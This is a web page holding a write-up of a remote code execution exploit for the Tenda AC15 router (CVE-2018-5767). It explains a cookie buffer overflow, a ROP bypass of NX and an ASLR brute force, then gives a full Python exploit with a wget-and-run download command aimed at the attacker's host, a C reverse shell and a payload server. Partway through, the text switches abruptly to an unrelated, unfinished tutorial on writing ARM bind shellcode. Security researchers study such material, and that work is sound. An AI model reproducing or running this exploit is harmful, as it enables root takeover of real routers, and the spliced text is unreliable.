REMOTE CODE EXECUTION ROP,NX,ASLR (CVE-2018-5767) Tenda’s AC15 router

INTRODUCTION (CVE-2018-5767)

In this post we will be presenting a pre-authenticated remote code execution vulnerability present in Tenda’s AC15 router. We start by analysing the vulnerability, before moving on to our regular pattern of exploit development – identifying problems and then fixing those in turn to develop a working exploit.

N.B – Numerous attempts were made to contact the vendor with no success. Due to the nature of the vulnerability, offset’s have been redacted from the post to prevent point and click exploitation.

LAYING THE GROUNDWORK

The vulnerability in question is caused by a buffer overflow due to unsanitised user input being passed directly to a call to sscanf. The figure below shows the vulnerable code in the R7WebsSecurityHandler function of the HTTPD binary for the device.

Note that the “password=” parameter is part of the Cookie header. We see that the code uses strstr to find this field, and then copies everything after the equals size (excluding a ‘;’ character – important for later) into a fixed size stack buffer.

If we send a large enough password value we can crash the server, in the following picture we have attached to the process using a cross compiled Gdbserver binary, we can access the device using telnet (a story for another post).

This crash isn’t exactly ideal. We can see that it’s due to an invalid read attempting to load a byte from R3 which points to 0x41414141. From our analysis this was identified as occurring in a shared library and instead of looking for ways to exploit it, we turned our focus back on the vulnerable function to try and determine what was happening after the overflow.

In the next figure we see the issue; if the string copied into the buffer contains “.gif”, then the function returns immediately without further processing. The code isn’t looking for “.gif” in the password, but in the user controlled buffer for the whole request. Avoiding further processing of a overflown buffer and returning immediately is exactly what we want (loc_2f7ac simply jumps to the function epilogue).

Appending “.gif” to the end of a long password string of “A”‘s gives us a segfault with PC=0x41414141. With the ability to reliably control the flow of execution we can now outline the problems we must address, and therefore begin to solve them – and so at the same time, develop a working exploit.

To begin with, the following information is available about the binary:

file httpd
format elf
type EXEC (Executable file)
arch arm
bintype elf
bits 32
canary false
endian little
intrp /lib/ld-uClibc.so.0
machine ARM
nx true
pic false
relocs false
relro no
static false

I’ve only included the most important details – mainly, the binary is a 32bit ARMEL executable, dynamically linked with NX being the only exploit mitigation enabled (note that the system has randomize_va_space = 1, which we’ll have to deal with). Therefore, we have the following problems to address:

  1. Gain reliable control of PC through offset of controllable buffer.
  2. Bypass No Execute (NX, the stack is not executable).
  3. Bypass Address space layout randomisation (randomize_va_space = 1).
  4. Chain it all together into a full exploit.

PROBLEM SOLVING 101

The first problem to solve is a general one when it comes to exploiting memory corruption vulnerabilities such as this –  identifying the offset within the buffer at which we can control certain registers. We solve this problem using Metasploit’s pattern create and pattern offset scripts. We identify the correct offset and show reliable control of the PC register:

With problem 1 solved, our next task involves bypassing No Execute. No Execute (NX or DEP) simply prevents us from executing shellcode on the stack. It ensures that there are no writeable and executable pages of memory. NX has been around for a while so we won’t go into great detail about how it works or its bypasses, all we need is some ROP magic.

We make use of the “Return to Zero Protection” (ret2zp) method [1]. The problem with building a ROP chain for the ARM architecture is down to the fact that function arguments are passed through the R0-R3 registers, as opposed to the stack for Intel x86. To bypass NX on an x86 processor we would simply carry out a ret2libc attack, whereby we store the address of libc’s system function at the correct offset, and then a null terminated string at offset+4 for the command we wish to run:

To perform a similar attack on our current target, we need to pass the address of our command through R0, and then need some way of jumping to the system function. The sort of gadget we need for this is a mov instruction whereby the stack pointer is moved into R0. This gives us the following layout:

We identify such a gadget in the libc shared library, however, the gadget performs the following instructions.

mov sp, r0
blx r3

This means that before jumping to this gadget, we must have the address of system in R3. To solve this problem, we simply locate a gadget that allows us to mov or pop values from the stack into R3, and we identify such a gadget again in the libc library:

pop {r3,r4,r7,pc}

This gadget has the added benefit of jumping to SP+12, our buffer should therefore look as such:

Note the ‘;.gif’ string at the end of the buffer, recall that the call to sscanf stops at a ‘;’ character, whilst the ‘.gif’ string will allow us to cleanly exit the function. With the following Python code, we have essentially bypassed NX with two gadgets:

libc_base = ****
curr_libc = libc_base + (0x7c << 12)
system = struct.pack(«<I», curr_libc + ****)
#: pop {r3, r4, r7, pc}
pop = struct.pack(«<I», curr_libc + ****)
#: mov r0, sp ; blx r3
mv_r0_sp = struct.pack(«<I», curr_libc + ****)
password = «A»*offset
password += pop + system + «B»*8 + mv_r0_sp + command + «.gif»

With problem 2 solved, we now move onto our third problem; bypassing ASLR. Address space layout randomisation can be very difficult to bypass when we are attacking network based applications, this is generally due to the fact that we need some form of information leak. Although it is not enabled on the binary itself, the shared library addresses all load at different addresses on each execution. One method to generate an information leak would be to use “native” gadgets present in the HTTPD binary (which does not have ASLR) and ROP into the leak. The problem here however is that each gadget contains a null byte, and so we can only use 1. If we look at how random the randomisation really is, we see that actually the library addresses (specifically libc which contains our gadgets) only differ by one byte on each execution. For example, on one run libc’s base may be located at 0xXXXXXXXX, and on the next run it is at 0xXXXXXXXX

. We could theoretically guess this value, and we would have a small chance of guessing correct.

This is where our faithful watchdog process comes in. One process running on this device is responsible for restarting services that have crashed, so every time the HTTPD process segfaults, it is immediately restarted, pretty handy for us. This is enough for us to do some naïve brute forcing, using the following process:

With NX and ASLR successfully bypassed, we now need to put this all together (problem 3). This however, provides us with another set of problems to solve:

  1. How do we detect the exploit has been successful?
  2. How do we use this exploit to run arbitrary code on the device?

We start by solving problem 2, which in turn will help us solve problem 1. There are a few steps involved with running arbitrary code on the device. Firstly, we can make use of tools on the device to download arbitrary scripts or binaries, for example, the following command string will download a file from a remote server over HTTP, change its permissions to executable and then run it:

command = «wget http://192.168.0.104/malware -O /tmp/malware && chmod 777 /tmp/malware && /tmp/malware &;»

The “malware” binary should give some indication that the device has been exploited remotely, to achieve this, we write a simple TCP connect back program. This program will create a connection back to our attacking system, and duplicate the stdin and stdout file descriptors – it’s just a simple reverse shell.

#include <sys/socket.h>

#include <sys/types.h>

#include <string.h>

#include <stdio.h>

#include <netinet/in.h>

int main(int argc, char **argv)

{

struct sockaddr_in addr;

socklen_t addrlen;

int sock = socket(AF_INET, SOCK_STREAM, 0);

memset(&addr, 0x00, sizeof(addr));

addr.sin_family = AF_INET;

addr.sin_port = htons(31337);

addr.sin_addr.s_addr = inet_addr(“192.168.0.104”);

int conn = connect(sock, (struct sockaddr *)&addr,sizeof(addr));

dup2(sock, 0);

dup2(sock, 1);

dup2(sock, 2);

system(“/bin/sh”);

}

We need to cross compile this code into an ARM binary, to do this, we use a prebuilt toolchain downloaded from Uclibc. We also want to automate the entire process of this exploit, as such, we use the following code to handle compiling the malicious code (with a dynamically configurable IP address). We then use a subprocess to compile the code (with the user defined port and IP), and serve it over HTTP using Python’s SimpleHTTPServer module.

”’

* Take the ARM_REV_SHELL code and modify it with

* the given ip and port to connect back to.

* This function then compiles the code into an

* ARM binary.

@Param comp_path – This should be the path of the cross-compiler.

@Param my_ip – The IP address of the system running this code.

”’

def compile_shell(comp_path, my_ip):

global ARM_REV_SHELL

outfile = open(“a.c”, “w”)

 

ARM_REV_SHELL = ARM_REV_SHELL%(REV_PORT, my_ip)

 

#write the code with ip and port to a.c

outfile.write(ARM_REV_SHELL)

outfile.close()

 

compile_cmd = [comp_path, “a.c”,”-o”, “a”]

 

s = subprocess.Popen(compile_cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)

 

#wait for the process to terminate so we can get its return code

while s.poll() == None:

continue

 

if s.returncode == 0:

return True

else:

print “[x] Error compiling code, check compiler? Read the README?”

return False

 

”’

* This function uses the SimpleHTTPServer module to create

* a http server that will serve our malicious binary.

* This function is called as a thread, as a daemon process.

”’

def start_http_server():

Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

httpd = SocketServer.TCPServer((“”, HTTPD_PORT), Handler)

 

print “[+] Http server started on port %d” %HTTPD_PORT

httpd.serve_forever()

This code will allow us to utilise the wget tool present on the device to fetch our binary and run it, this in turn will allow us to solve problem 1. We can identify if the exploit has been successful by waiting for connections back. The abstract diagram in the next figure shows how we can make use of a few threads with a global flag to solve problem 1 given the solution to problem 2.

The functions shown in the following code take care of these processes:

”’

* This function creates a listening socket on port

* REV_PORT. When a connection is accepted it updates

* the global DONE flag to indicate successful exploitation.

* It then jumps into a loop whereby the user can send remote

* commands to the device, interacting with a spawned /bin/sh

* process.

”’

def threaded_listener():

global DONE

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)

 

host = (“0.0.0.0”, REV_PORT)

 

try:

s.bind(host)

except:

print “[+] Error binding to %d” %REV_PORT

return -1

 

print “[+] Connect back listener running on port %d” %REV_PORT

 

s.listen(1)

conn, host = s.accept()

 

#We got a connection, lets make the exploit thread aware

DONE = True

 

print “[+] Got connect back from %s” %host[0]

print “[+] Entering command loop, enter exit to quit”

 

#Loop continuosly, simple reverse shell interface.

while True:

print “#”,

cmd = raw_input()

if cmd == “exit”:

break

if cmd == ”:

continue

 

conn.send(cmd + “\n”)

 

print conn.recv(4096)

 

”’

* This function presents the actual vulnerability exploited.

* The Cookie header has a password field that is vulnerable to

* a sscanf buffer overflow, we make use of 2 ROP gadgets to

* bypass DEP/NX, and can brute force ASLR due to a watchdog

* process restarting any processes that crash.

* This function will continually make malicious requests to the

* devices web interface until the DONE flag is set to True.

@Param host – the ip address of the target.

@Param port – the port the webserver is running on.

@Param my_ip – The ip address of the attacking system.

”’

def exploit(host, port, my_ip):

global DONE

url = “http://%s:%s/goform/exeCommand”%(host, port)

i = 0

 

command = “wget http://%s:%s/a -O /tmp/a && chmod 777

/tmp/a && /tmp/./a &;” %(my_ip, HTTPD_PORT)

 

#Guess the same libc base address each time

libc_base = ****

curr_libc = libc_base + (0x7c << 12)

 

system = struct.pack(“<I”, curr_libc + ****)

 

#: pop {r3, r4, r7, pc}

pop = struct.pack(“<I”, curr_libc + ****)

#: mov r0, sp ; blx r3

mv_r0_sp = struct.pack(“<I”, curr_libc + ****)

 

password = “A”*offset

password += pop + system + “B”*8 + mv_r0_sp + command + “.gif”

 

print “[+] Beginning brute force.”

while not DONE:

i += 1

print “[+] Attempt %d”%i

 

#build the request, with the malicious password field

req = urllib2.Request(url)

req.add_header(“Cookie”, “password=%s”%password)

 

#The request will throw an exception when we crash the server,

#we don’t care about this, so don’t handle it.

try:

resp = urllib2.urlopen(req)

except:

pass

 

#Give the device some time to restart the process.

time.sleep(1)

 

print “[+] Exploit done”

Finally, we put all of this together by spawning the individual threads, as well as getting command line options as usual:

def main():

parser = OptionParser()

parser.add_option(“-t”, “–target”, dest=”host_ip”,

help=”IP address of the target”)

parser.add_option(“-p”, “–port”, dest=”host_port”,

help=”Port of the targets webserver”)

parser.add_option(“-c”, “–comp-path”, dest=”compiler_path”,

help=”path to arm cross compiler”)

parser.add_option(“-m”, “–my-ip”, dest=”my_ip”, help=”your  ip address”)

 

options, args = parser.parse_args()

 

host_ip = options.host_ip

host_port = options.host_port

comp_path = options.compiler_path

my_ip = options.my_ip

 

if host_ip == None or host_port == None:

parser.error(“[x] A target ip address (-t) and port (-p) are required”)

 

if comp_path == None:

parser.error(“[x] No compiler path specified,

you need a uclibc arm cross compiler,

such as https://www.uclibc.org/downloads/

binaries/0.9.30/cross-compiler-arm4l.tar.bz2″)

 

if my_ip == None:

parser.error(“[x] Please pass your ip address (-m)”)

 

 

if not compile_shell(comp_path, my_ip):

print “[x] Exiting due to error in compiling shell”

return -1

 

httpd_thread = threading.Thread(target=start_http_server)

httpd_thread.daemon = True

httpd_thread.start()

 

conn_listener = threading.Thread(target=threaded_listener)

conn_listener.start()

 

#Give the thread a little time to start up, and fail if that happens

time.sleep(3)

 

if not conn_listener.is_alive():

print “[x] Exiting due to conn_listener error”

return -1

 

 

exploit(host_ip, host_port, my_ip)

 

 

conn_listener.join()

 

return 0

 

 

 

if __name__ == ‘__main__’:

main()

With all of this together, we run the code and after a few minutes get our reverse shell as root:

The full code is here:

#!/usr/bin/env python

import urllib2

import struct

import time

import socket

from optparse import *

import SimpleHTTPServer

import SocketServer

import threading

import sys

import os

import subprocess

 

ARM_REV_SHELL = (

“#include <sys/socket.h>\n”

“#include <sys/types.h>\n”

“#include <string.h>\n”

“#include <stdio.h>\n”

“#include <netinet/in.h>\n”

“int main(int argc, char **argv)\n”

“{\n”

”           struct sockaddr_in addr;\n”

”           socklen_t addrlen;\n”

”           int sock = socket(AF_INET, SOCK_STREAM, 0);\n”

 

”           memset(&addr, 0x00, sizeof(addr));\n”

 

”           addr.sin_family = AF_INET;\n”

”           addr.sin_port = htons(%d);\n”

”           addr.sin_addr.s_addr = inet_addr(\”%s\”);\n”

 

”           int conn = connect(sock, (struct sockaddr *)&addr,sizeof(addr));\n”

 

”           dup2(sock, 0);\n”

”           dup2(sock, 1);\n”

”           dup2(sock, 2);\n”

 

”           system(\”/bin/sh\”);\n”

“}\n”

)

 

REV_PORT = 31337

HTTPD_PORT = 8888

DONE = False

 

”’

* This function creates a listening socket on port

* REV_PORT. When a connection is accepted it updates

* the global DONE flag to indicate successful exploitation.

* It then jumps into a loop whereby the user can send remote

* commands to the device, interacting with a spawned /bin/sh

* process.

”’

def threaded_listener():

global DONE

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)

 

host = (“0.0.0.0”, REV_PORT)

 

try:

s.bind(host)

except:

print “[+] Error binding to %d” %REV_PORT

return -1

 

 

print “[+] Connect back listener running on port %d” %REV_PORT

 

s.listen(1)

conn, host = s.accept()

 

#We got a connection, lets make the exploit thread aware

DONE = True

 

print “[+] Got connect back from %s” %host[0]

print “[+] Entering command loop, enter exit to quit”

 

#Loop continuosly, simple reverse shell interface.

while True:

print “#”,

cmd = raw_input()

if cmd == “exit”:

break

if cmd == ”:

continue

 

conn.send(cmd + “\n”)

 

print conn.recv(4096)

 

”’

* Take the ARM_REV_SHELL code and modify it with

* the given ip and port to connect back to.

* This function then compiles the code into an

* ARM binary.

@Param comp_path – This should be the path of the cross-compiler.

@Param my_ip – The IP address of the system running this code.

”’

def compile_shell(comp_path, my_ip):

global ARM_REV_SHELL

outfile = open(“a.c”, “w”)

 

ARM_REV_SHELL = ARM_REV_SHELL%(REV_PORT, my_ip)

 

outfile.write(ARM_REV_SHELL)

outfile.close()

 

compile_cmd = [comp_path, “a.c”,”-o”, “a”]

 

s = subprocess.Popen(compile_cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)

 

while s.poll() == None:

continue

 

if s.returncode == 0:

return True

else:

print “[x] Error compiling code, check compiler? Read the README?”

return False

 

”’

* This function uses the SimpleHTTPServer module to create

* a http server that will serve our malicious binary.

* This function is called as a thread, as a daemon process.

”’

def start_http_server():

Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

httpd = SocketServer.TCPServer((“”, HTTPD_PORT), Handler)

 

print “[+] Http server started on port %d” %HTTPD_PORT

httpd.serve_forever()

 

 

”’

* This function presents the actual vulnerability exploited.

* The Cookie header has a password field that is vulnerable to

* a sscanf buffer overflow, we make use of 2 ROP gadgets to

* bypass DEP/NX, and can brute force ASLR due to a watchdog

* process restarting any processes that crash.

* This function will continually make malicious requests to the

* devices web interface until the DONE flag is set to True.

@Param host – the ip address of the target.

@Param port – the port the webserver is running on.

@Param my_ip – The ip address of the attacking system.

”’

def exploit(host, port, my_ip):

global DONE

url = “http://%s:%s/goform/exeCommand”%(host, port)

i = 0

 

command = “wget http://%s:%s/a -O /tmp/a && chmod 777 /tmp/a && /tmp/./a &;” %(my_ip, HTTPD_PORT)

 

#Guess the same libc base continuosly

libc_base = ****

curr_libc = libc_base + (0x7c << 12)

 

system = struct.pack(“<I”, curr_libc + ****)

 

#: pop {r3, r4, r7, pc}

pop = struct.pack(“<I”, curr_libc + ****)

#: mov r0, sp ; blx r3

mv_r0_sp = struct.pack(“<I”, curr_libc + ****)

 

password = “A”*offset

password += pop + system + “B”*8 + mv_r0_sp + command + “.gif”

 

print “[+] Beginning brute force.”

while not DONE:

i += 1

print “[+] Attempt %d” %i

 

#build the request, with the malicious password field

req = urllib2.Request(url)

req.add_header(“Cookie”, “password=%s”%password)

 

#The request will throw an exception when we crash the server,

#we don’t care about this, so don’t handle it.

try:

resp = urllib2.urlopen(req)

except:

pass

 

#Give the device some time to restart the

time.sleep(1)

 

print “[+] Exploit done”

 

 

def main():

parser = OptionParser()

parser.add_option(“-t”, “–target”, dest=”host_ip”, help=”IP address of the target”)

parser.add_option(“-p”, “–port”, dest=”host_port”, help=”Port of the targets webserver”)

parser.add_option(“-c”, “–comp-path”, dest=”compiler_path”, help=”path to arm cross compiler”)

parser.add_option(“-m”, “–my-ip”, dest=”my_ip”, help=”your ip address”)

 

options, args = parser.parse_args()

 

host_ip = options.host_ip

host_port = options.host_port

comp_path = options.compiler_path

my_ip = options.my_ip

 

if host_ip == None or host_port == None:

parser.error(“[x] A target ip address (-t) and port (-p) are required”)

 

if comp_path == None:

parser.error(“[x] No compiler path specified, you need a uclibc arm cross compiler, such as https://www.uclibc.org/downloads/binaries/0.9.30/cross-compiler-arm4l.tar.bz2”)

 

if my_ip == None:

parser.error(“[x] Please pass your ip address (-m)”)

 

 

if not compile_shell(comp_path, my_ip):

print “[x] Exiting due to error in compiling shell”

return -1

 

httpd_thread = threading.Thread(target=start_http_server)

httpd_thread.daemon = True

httpd_thread.start()

 

conn_listener = threading.Thread(target=threaded_listener)

conn_listener.start()

 

#Give the thread a little time to start up, and fail if that happens

time.sleep(3)

 

if not conn_listener.is_alive():

print “[x] Exiting due to conn_listener error”

return -1

 

 

exploit(host_ip, host_port, my_ip)

 

 

conn_listener.join()

 

return 0

 

 

 

if __name__ == ‘__main__’:

main()

TCP Bind Shell in Assembly (ARM 32-bit)

In this tutorial, you will learn how to write TCP bind shellcode that is free of null bytes and can be used as shellcode for exploitation. When I talk about exploitation, I’m strictly referring to approved and legal vulnerability research. For those of you relatively new to software exploitation, let me tell you that this knowledge can, in fact, be used for good. If I find a software vulnerability like a stack overflow and want to test its exploitability, I need working shellcode. Not only that, I need techniques to use that shellcode in a way that it can be executed despite the security measures in place. Only then I can show the exploitability of this vulnerability and the techniques malicious attackers could be using to take advantage of security flaws.

After going through this tutorial, you will not only know how to write shellcode that binds a shell to a local port, but also how to write any shellcode for that matter. To go from bind shellcode to reverse shellcode is just about changing 1-2 functions, some parameters, but most of it is the same. Writing a bind or reverse shell is more difficult than creating a simple execve() shell. If you want to start small, you can learn how to write a simple execve() shell in assembly before diving into this slightly more extensive tutorial. If you need a refresher in Arm assembly, take a look at my ARM Assembly Basics tutorial series, or use this Cheat Sheet:

Before we start, I’d like to remind you that we’re creating ARM shellcode and therefore need to set up an ARM lab environment if you don’t already have one. You can set it up yourself (Emulate Raspberry Pi with QEMU) or save time and download the ready-made Lab VM I created (ARM Lab VM). Ready?

UNDERSTANDING THE DETAILS

First of all, what is a bind shell and how does it really work? With a bind shell, you open up a communication port or a listener on the target machine. The listener then waits for an incoming connection, you connect to it, the listener accepts the connection and gives you shell access to the target system.

This is different from how Reverse Shells work. With a reverse shell, you make the target machine communicate back to your machine. In that case, your machine has a listener port on which it receives the connection back from the target system.

 

Both types of shell have their advantages and disadvantages depending on the target environment. It is, for example, more common that the firewall of the target network fails to block outgoing connections than incoming. This means that your bind shell would bind a port on the target system, but since incoming connections are blocked, you wouldn’t be able to connect to it. Therefore, in some scenarios, it is better to have a reverse shell that can take advantage of firewall misconfigurations that allow outgoing connections. If you know how to write a bind shell, you know how to write a reverse shell. There are only a couple of changes necessary to transform your assembly code into a reverse shell once you understand how it is done.

To translate the functionalities of a bind shell into assembly, we first need to get familiar with the process of a bind shell:

  1. Create a new TCP socket
  2. Bind socket to a local port
  3. Listen for incoming connections
  4. Accept incoming connection
  5. Redirect STDIN, STDOUT and STDERR to a newly created socket from a client
  6. Spawn the shell

This is the C code we will use for our translation.

#include <stdio.h> 
#include <sys/types.h>  
#include <sys/socket.h> 
#include <netinet/in.h> 

int host_sockid;    // socket file descriptor 
int client_sockid;  // client file descriptor 

struct sockaddr_in hostaddr;            // server aka listen address

int main() 
{ 
    // Create new TCP socket 
    host_sockid = socket(PF_INET, SOCK_STREAM, 0); 

    // Initialize sockaddr struct to bind socket using it 
    hostaddr.sin_family = AF_INET;                  // server socket type address family = internet protocol address
    hostaddr.sin_port = htons(4444);                // server port, converted to network byte order
    hostaddr.sin_addr.s_addr = htonl(INADDR_ANY);   // listen to any address, converted to network byte order

    // Bind socket to IP/Port in sockaddr struct 
    bind(host_sockid, (struct sockaddr*) &hostaddr, sizeof(hostaddr)); 

    // Listen for incoming connections 
    listen(host_sockid, 2); 

    // Accept incoming connection 
    client_sockid = accept(host_sockid, NULL, NULL); 

    // Duplicate file descriptors for STDIN, STDOUT and STDERR 
    dup2(client_sockid, 0); 
    dup2(client_sockid, 1); 
    dup2(client_sockid, 2); 

    // Execute /bin/sh 
    execve("/bin/sh", NULL, NULL); 
    close(host_sockid); 

    return 0; 
}
STAGE ONE: SYSTEM FUNCTIONS AND THEIR PARAMETERS

The first step is to identify the necessary system functions, their parameters, and their system call numbers. Looking at the C code above, we can see that we need the following functions: socket, bind, listen, accept, dup2, execve. You can figure out the system call numbers of these functions with the following command:

pi@raspberrypi:~/bindshell $ cat /usr/include/arm-linux-gnueabihf/asm/unistd.h | grep socket
#define __NR_socketcall             (__NR_SYSCALL_BASE+102)
#define __NR_socket                 (__NR_SYSCALL_BASE+281)
#define __NR_socketpair             (__NR_SYSCALL_BASE+288)
#undef __NR_socketcall

If you’re wondering about the value of _NR_SYSCALL_BASE, it’s 0:

root@raspberrypi:/home/pi# grep -R "__NR_SYSCALL_BASE" /usr/include/arm-linux-gnueabihf/asm/
/usr/include/arm-linux-gnueabihf/asm/unistd.h:#define __NR_SYSCALL_BASE 0

These are all the syscall numbers we’ll need:

#define __NR_socket    (__NR_SYSCALL_BASE+281)
#define __NR_bind      (__NR_SYSCALL_BASE+282)
#define __NR_listen    (__NR_SYSCALL_BASE+284)
#define __NR_accept    (__NR_SYSCALL_BASE+285)
#define __NR_dup2      (__NR_SYSCALL_BASE+ 63)
#define __NR_execve    (__NR_SYSCALL_BASE+ 11)

The parameters each function expects can be looked up in the linux man pages, or on w3challs.com.

The next step is to figure out the specific values of these parameters. One way of doing that is to look at a successful bind shell connection using strace. Strace is a tool you can use to trace system calls and monitor interactions between processes and the Linux Kernel. Let’s use strace to test the C version of our bind shell. To reduce the noise, we limit the output to the functions we’re interested in.

Terminal 1:
pi@raspberrypi:~/bindshell $ gcc bind_test.c -o bind_test
pi@raspberrypi:~/bindshell $ strace -e execve,socket,bind,listen,accept,dup2 ./bind_test
Terminal 2:
pi@raspberrypi:~ $ netstat -tlpn
Proto Recv-Q  Send-Q  Local Address  Foreign Address  State     PID/Program name
tcp    0      0       0.0.0.0:22     0.0.0.0:*        LISTEN    - 
tcp    0      0       0.0.0.0:4444   0.0.0.0:*        LISTEN    1058/bind_test 
pi@raspberrypi:~ $ netcat -nv 0.0.0.0 4444
Connection to 0.0.0.0 4444 port [tcp/*] succeeded!

This is our strace output:

pi@raspberrypi:~/bindshell $ strace -e execve,socket,bind,listen,accept,dup2 ./bind_test
execve("./bind_test", ["./bind_test"], [/* 49 vars */]) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
bind(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
listen(3, 2) = 0
accept(3, 0, NULL) = 4
dup2(4, 0) = 0
dup2(4, 1) = 1
dup2(4, 2) = 2
execve("/bin/sh", [0], [/* 0 vars */]) = 0

Now we can fill in the gaps and note down the values we’ll need to pass to the functions of our assembly bind shell.

STAGE TWO: STEP BY STEP TRANSLATION

In the first stage, we answered the following questions to get everything we need for our assembly program:

  1. Which functions do I need?
  2. What are the system call numbers of these functions?
  3. What are the parameters of these functions?
  4. What are the values of these parameters?

This step is about applying this knowledge and translating it to assembly. Split each function into a separate chunk and repeat the following process:

  1. Map out which register you want to use for which parameter
  2. Figure out how to pass the required values to these registers
    1. How to pass an immediate value to a register
    2. How to nullify a register without directly moving a #0 into it (we need to avoid null-bytes in our code and must therefore find other ways to nullify a register or a value in memory)
    3. How to make a register point to a region in memory which stores constants and strings
  3. Use the right system call number to invoke the function and keep track of register content changes
    1. Keep in mind that the result of a system call will land in r0, which means that in case you need to reuse the result of that function in another function, you need to save it into another register before invoking the function.
    2. Example: host_sockid = socket(2, 1, 0) – the result (host_sockid) of the socket call will land in r0. This result is reused in other functions like listen(host_sockid, 2), and should therefore be preserved in another register.

0 – Switch to Thumb Mode

The first thing you should do to reduce the possibility of encountering null-bytes is to use Thumb mode. In Arm mode, the instructions are 32-bit, in Thumb mode they are 16-bit. This means that we can already reduce the chance of having null-bytes by simply reducing the size of our instructions. To recap how to switch to Thumb mode: ARM instructions must be 4 byte aligned. To change the mode from ARM to Thumb, set the LSB (Least Significant Bit) of the next instruction’s address (found in PC) to 1 by adding 1 to the PC register’s value and saving it to another register. Then use a BX (Branch and eXchange) instruction to branch to this other register containing the address of the next instruction with the LSB set to one, which makes the processor switch to Thumb mode. It all boils down to the following two instructions.

.section .text
.global _start
_start:
    .ARM
    add     r3, pc, #1            
    bx      r3

From here you will be writing Thumb code and will therefore need to indicate this by using the .THUMB directive in your code.

1 – Create new Socket

 

These are the values we need for the socket call parameters:

root@raspberrypi:/home/pi# grep -R "AF_INET\|PF_INET \|SOCK_STREAM =\|IPPROTO_IP =" /usr/include/
/usr/include/linux/in.h: IPPROTO_IP = 0,                               // Dummy protocol for TCP 
/usr/include/arm-linux-gnueabihf/bits/socket_type.h: SOCK_STREAM = 1,  // Sequenced, reliable, connection-based
/usr/include/arm-linux-gnueabihf/bits/socket.h:#define PF_INET 2       // IP protocol family. 
/usr/include/arm-linux-gnueabihf/bits/socket.h:#define AF_INET PF_INET

After setting up the parameters, you invoke the socket system call with the svc instruction. The result of this invocation will be our host_sockid and will end up in r0. Since we need host_sockid later on, let’s save it to r4.

In ARM, you can’t simply move any immediate value into a register. If you’re interested more details about this nuance, there is a section in the Memory Instructions chapter (at the very end).

To check if I can use a certain immediate value, I wrote a tiny script (ugly code, don’t look) called rotator.py.

pi@raspberrypi:~/bindshell $ python rotator.py
Enter the value you want to check: 281
Sorry, 281 cannot be used as an immediate number and has to be split.

pi@raspberrypi:~/bindshell $ python rotator.py
Enter the value you want to check: 200
The number 200 can be used as a valid immediate number.
50 ror 30 --> 200

pi@raspberrypi:~/bindshell $ python rotator.py
Enter the value you want to check: 81
The number 81 can be used as a valid immediate number.
81 ror 0 --> 81

Final code snippet:

    .THUMB
    mov     r0, #2
    mov     r1, #1
    sub     r2, r2, r2
    mov     r7, #200
    add     r7, #81                // r7 = 281 (socket syscall number) 
    svc     #1                     // r0 = host_sockid value 
    mov     r4, r0                 // save host_sockid in r4

2 – Bind Socket to Local Port

 

With the first instruction, we store a structure object containing the address family, host port and host address in the literal pool and reference this object with pc-relative addressing. The literal pool is a memory area in the same section (because the literal pool is part of the code) storing constants, strings, or offsets. Instead of calculating the pc-relative offset manually, you can use an ADR instruction with a label. ADR accepts a PC-relative expression, that is, a label with an optional offset where the address of the label is relative to the PC label. Like this:

// bind(r0, &sockaddr, 16)
 adr r1, struct_addr    // pointer to address, port
 [...]
struct_addr:
.ascii "\x02\xff"       // AF_INET 0xff will be NULLed 
.ascii "\x11\x5c"       // port number 4444 
.byte 1,1,1,1           // IP Address

The next 5 instructions are STRB (store byte) instructions. A STRB instruction stores one byte from a register to a calculated memory region. The syntax [r1, #1] means that we take R1 as the base address and the immediate value (#1) as an offset.

In the first instruction we made R1 point to the memory region where we store the values of the address family AF_INET, the local port we want to use, and the IP address. We could either use a static IP address, or we could specify 0.0.0.0 to make our bind shell listen on all IPs which the target is configured with, making our shellcode more portable. Now, those are a lot of null-bytes.

Again, the reason we want to get rid of any null-bytes is to make our shellcode usable for exploits that take advantage of memory corruption vulnerabilities that might be sensitive to null-bytes. Some buffer overflows are caused by improper use of functions like ‘strcpy’. The job of strcpy is to copy data until it receives a null-byte. We use the overflow to take control over the program flow and if strcpy hits a null-byte it will stop copying our shellcode and our exploit will not work. With the strb instruction we take a null byte from a register and modify our own code during execution. This way, we don’t actually have a null byte in our shellcode, but dynamically place it there. This requires the code section to be writable and can be achieved by adding the -N flag during the linking process.

For this reason, we code without null-bytes and dynamically put a null-byte in places where it’s necessary. As you can see in the next picture, the IP address we specify is 1.1.1.1 which will be replaced by 0.0.0.0 during execution.

 

The first STRB instruction replaces the placeholder xff in \x02\xff with x00 to set the AF_INET to \x02\x00. How do we know that it’s a null byte being stored? Because r2 contains 0’s only due to the “sub r2, r2, r2” instruction which cleared the register. The next 4 instructions replace 1.1.1.1 with 0.0.0.0. Instead of the four strb instructions after strb r2, [r1, #1], you can also use one single str r2, [r1, #4] to do a full 0.0.0.0 write.

The move instruction puts the length of the sockaddr_in structure length (2 bytes for AF_INET, 2 bytes for PORT, 4 bytes for ipaddress, 8 bytes padding = 16 bytes) into r2. Then, we set r7 to 282 by simply adding 1 to it, because r7 already contains 281 from the last syscall.

// bind(r0, &sockaddr, 16)
    adr  r1, struct_addr   // pointer to address, port
    strb r2, [r1, #1]     // write 0 for AF_INET
    strb r2, [r1, #4]     // replace 1 with 0 in x.1.1.1
    strb r2, [r1, #5]     // replace 1 with 0 in 0.x.1.1
    strb r2, [r1, #6]     // replace 1 with 0 in 0.0.x.1
    strb r2, [r1, #7]     // replace 1 with 0 in 0.0.0.x
    mov r2, #16
    add r7, #1            // r7 = 281+1 = 282 (bind syscall number) 
    svc #1
    nop

3 – Listen for Incoming Connections

Here we put the previously saved host_sockid into r0. R1 is set to 2, and r7 is just increased by 2 since it still contains the 282 from the last syscall.

mov     r0, r4     // r0 = saved host_sockid 
mov     r1, #2
add     r7, #2     // r7 = 284 (listen syscall number)
svc     #1

4 – Accept Incoming Connection

 

Here again, we put the saved host_sockid into r0. Since we want to avoid null bytes, we use don’t directly move #0 into r1 and r2, but instead, set them to 0 by subtracting them from each other. R7 is just increased by 1. The result of this invocation will be our client_sockid, which we will save in r4, because we will no longer need the host_sockid that was kept there (we will skip the close function call from our C code).

